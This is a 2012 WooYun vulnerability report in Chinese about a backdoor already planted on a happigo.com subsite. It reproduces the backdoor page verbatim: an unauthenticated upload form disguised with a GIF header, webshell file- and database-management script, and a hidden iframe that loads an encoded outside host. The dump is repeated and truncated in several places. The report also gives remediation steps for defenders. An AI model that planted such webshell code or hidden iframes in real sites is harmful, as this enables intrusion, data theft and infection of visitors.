
漏洞概要

缺陷编号:wooyun-2012-010629

漏洞标题:快乐购某站(posgoo.happigo.com)被植入后门:管理目录下存在可直接访问的 webshell 上传页面

相关厂商:快乐购物股份有限公司

漏洞作者: zeracker

提交时间:2012-08-06 13:08

修复时间:2012-08-11 13:09

公开时间:2012-08-11 13:09

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2012-08-06: 细节已通知厂商并且等待厂商处理中
2012-08-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

昨晚本来是打算在该站找漏洞的,结果通过 Google hacking 意外搜到了一个别人早已植入的后门(webshell 上传页面)——也就是说,在本报告提交之前该站就已经被入侵过了。只能说 Google hacking 确实强大。

详细说明:

http://posgoo.happigo.com/admin/system/codeigniter/cts.php


<!-- NOTE(review): verbatim dump of what http://posgoo.happigo.com/admin/system/codeigniter/cts.php
     returned, as pasted by the reporter. Only the client-side HTML is visible; the PHP that handles
     the upload is not on this page, so where it writes and with what permissions is not established here. -->
<!-- A ".php" file whose first bytes are the GIF magic "gif89a": this is the usual trick for passing
     upload filters that only sniff the leading bytes of a file -- an inference from the layout, not
     something the page itself proves. -->
gif89a
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<!-- The stylesheet asks index.php?i=dots for a row background, i.e. the markup was presumably lifted
     from a larger PHP file-manager / shell UI -- TODO confirm. -->
<style type="text/css">body,td{font-family:tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px;}
strong{font-size:12px;}
a:link{color:#0066CC;}
a:hover{color:#FF6600;}
a:visited{color:#003366;}
a:active{color:#9DCC00;}
a{TEXT-DECORATION:none}
table.itable{}
td.irows{height:20px;background:url("index.php?i=dots") repeat-x bottom}</style>
</head>
<!-- Helper script placed between </head> and <body>. Only FileChange is wired to the form below
     (the onchange on the file input); the other functions reference ids that the visible markup does
     not contain. IE-only APIs throughout (createTextRange, clipboardData, document.all). -->
<script type="text/javascript">/* oCopy: select obj's contents and copy them to the clipboard via IE-only createTextRange()/execCommand("Copy"); `js` is assigned without a declaration and so leaks as a global. */function oCopy(obj){obj.select();js=obj.createTextRange();js.execCommand("Copy");};/* sendtof: put url on the clipboard (IE window.clipboardData) and confirm with an alert whose text reads "address copied, paste it to share with your friends". */function sendtof(url){window.clipboardData.setData('Text',url);alert('复制地址成功,粘贴给你好友一起分享。');};/* select_format: toggle #site / #sited visibility from the #fmt checkbox; none of these ids exist in the form on this page. */function select_format(){var on=document.getElementById('fmt').checked;document.getElementById('site').style.display=on?'none':'';document.getElementById('sited').style.display=!on?'none':'';};/* flag: set once DrawImage has measured an image with non-zero dimensions, cleared by FileChange; nothing visible reads it. */var flag=false;/* DrawImage: scale ImgD to fit a 120x80 box keeping aspect ratio (width-bound when w/h >= 1.5, height-bound otherwise), leave smaller images at natural size, and write "WxH" into alt. Dimensions are read synchronously right after setting src, so this only sees a size for already-loaded/cached images. */function DrawImage(ImgD){var image=new Image();image.src=ImgD.src;if(image.width>0&&image.height>0){flag=true;if(image.width/image.height>=120/80){if(image.width>120){ImgD.width=120;ImgD.height=(image.height*120)/image.width;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}else {if(image.height>80){ImgD.height=80;ImgD.width=(image.width*80)/image.height;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}};};/* FileChange: reset the preview to 10x10 and point it at the locally chosen path; targets document.all.uploadimage, which is not present in the visible markup, so on this page it would simply throw. */function FileChange(Value){flag=false;document.all.uploadimage.width=10;document.all.uploadimage.height=10;document.all.uploadimage.alt="";document.all.uploadimage.src=Value;};</script>
<body>
<!-- The upload form itself. It has no action attribute, so the multipart POST goes back to cts.php;
     no credential, token or CSRF field appears anywhere in the visible markup, and the submit button
     carries an empty label -- consistent with a page meant to be found only by whoever planted it. -->
<center><form enctype="multipart/form-data" method="post" name="upform">
<input style="width:208;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17" name=upfile type=file
onchange="javascript:FileChange(this.value);"><br><input type="submit" value="" style="width:60;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17"><br>

<br>
<p><br>
</p>
</form>
</center>
<script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输入!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = 
"Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body><span style="display:none"><iframe src=http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D/admin/jpg.asp width=0 height=0></iframe></body></html></html></body><iframe src= width=0 height=0></iframe></html></body></html><script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = 
FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输入要新建的Mdb文件全名称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("E%69%70%67%6F%76%2E%63");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD 
COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body></html>
</html></body><iframe src= eateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DNaeateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!eateMdb"){DName = prompt("请名称,eateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DNa",FName);top.hideform.FName.value = DNawidth=0 height=0></iframe></html></body></html>
<script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("E%69%70%67%6F%76%2E%63",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = 
"Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'usernafunction yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new 
Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body></html>
</html></body><iframe src= width=0 height=0></iframe></html></body></ht吗?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输入要新建的Mdb文件全名称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = 
"Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body></html>
<!-- NOTE(review): a second repeat of the same upload page (head, identical helper script and the
     same upload form), this time without the gif89a prefix and cut off after </form> -- the
     closing </center>/</body>/</html> are missing. The dump repeats this content several times;
     whether the file was appended to on repeated re-infection or the paste was duplicated cannot be
     told from this page. -->
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">body,td{font-family:tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px;}
strong{font-size:12px;}
a:link{color:#0066CC;}
a:hover{color:#FF6600;}
a:visited{color:#003366;}
a:active{color:#9DCC00;}
a{TEXT-DECORATION:none}
table.itable{}
td.irows{height:20px;background:url("index.php?i=dots") repeat-x bottom}</style>
</head>
<!-- Same helper script as in the first copy: oCopy / sendtof / select_format / DrawImage / FileChange;
     only FileChange is referenced by the form. -->
<script type="text/javascript">function oCopy(obj){obj.select();js=obj.createTextRange();js.execCommand("Copy");};function sendtof(url){window.clipboardData.setData('Text',url);alert('复制地址成功,粘贴给你好友一起分享。');};function select_format(){var on=document.getElementById('fmt').checked;document.getElementById('site').style.display=on?'none':'';document.getElementById('sited').style.display=!on?'none':'';};var flag=false;function DrawImage(ImgD){var image=new Image();image.src=ImgD.src;if(image.width>0&&image.height>0){flag=true;if(image.width/image.height>=120/80){if(image.width>120){ImgD.width=120;ImgD.height=(image.height*120)/image.width;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}else {if(image.height>80){ImgD.height=80;ImgD.width=(image.width*80)/image.height;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}};};function FileChange(Value){flag=false;document.all.uploadimage.width=10;document.all.uploadimage.height=10;document.all.uploadimage.alt="";document.all.uploadimage.src=Value;};</script>
<body>
<!-- Unauthenticated multipart upload form posting back to cts.php (no action attribute). -->
<center><form enctype="multipart/form-data" method="post" name="upform">
<input style="width:208;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17" name=upfile type=file
onchange="javascript:FileChange(this.value);"><br><input type="submit" value="" style="width:60;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17"><br>

<br>
<p><br>
</p>
</form>

漏洞证明:


页面本身就是一个无需登录即可访问的文件上传表单(见上方 cts.php 返回的内容)。从贴出的内容还可以确认以下几点:
1. 文件扩展名是 .php,但内容以 gif89a(GIF 文件头)开头——这是常见的伪装成图片、绕过只检查文件头的上传过滤的 webshell 写法(推断,页面本身未给出上传入口)。
2. 上传表单没有 action,直接 POST 回 cts.php 自身;页面中看不到任何认证、口令或 token 校验。服务端 PHP 代码未贴出,因此后门实际的写入路径与权限无法从本报告判断。
3. 页面尾部被追加了一个 display:none 的 iframe,src 为 URL 编码的 http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D/admin/jpg.asp(解码为 http://404.ipgov.com/admin/jpg.asp),访问者会在不可见的情况下加载该外部地址——即除后门之外该页还被用于挂马/引流。
4. 追加的脚本里还带有文件管理与数据库管理的函数(FullForm、FullDbStr、FullSqlStr 等),预置的连接串指向 122.70.138.217(sa / root)和 D:\VirtualHost\343266.ctc-w217.dns.com.cn\www\db.mdb,口令已打码。这些更像是 webshell 模板自带的示例串,与快乐购自身的基础设施是否有关无法从页面判断,但说明该后门具备直接操作数据库的能力。
5. 同一段内容在输出中重复出现并伴有截断,推测该文件曾被多次追加写入(或被不同脚本反复感染),而非一次性植入。

修复方案:

1. 立即删除 posgoo.happigo.com 上的 /admin/system/codeigniter/cts.php,并以本报告中的特征(gif89a 文件头 + PHP/HTML 内容、display:none 的 iframe 指向 %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D、FullDbStr/runClock 等函数名)在同一主机及集团其他站点全盘排查是否还有其他后门或被追加的页面。
2. 通过 Web 访问日志定位 cts.php 的首次写入时间和来源 IP,查清最初的入侵入口(上传点、后台弱口令等——本报告并未给出);只删文件不补入口,后门会很快被重新植入。
3. 该后门位于 admin 目录下且无需认证即可访问,应对 admin 目录增加访问控制(认证 + 来源 IP 限制),上传接口按真实内容而非扩展名或文件头校验,并在上传目录禁止脚本执行。
4. 后门内含数据库管理功能,应视为相关数据库凭据已泄露:轮换口令,并核查数据是否被篡改或导出。
5. 将解码后的外联域名 404.ipgov.com 加入出口/WAF 拦截,并检查站内其他页面是否同样被插入了该 iframe。

版权声明:转载请注明来源 zeracker@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-08-11 13:09

厂商回复:

最新状态:

2012-08-17:已修复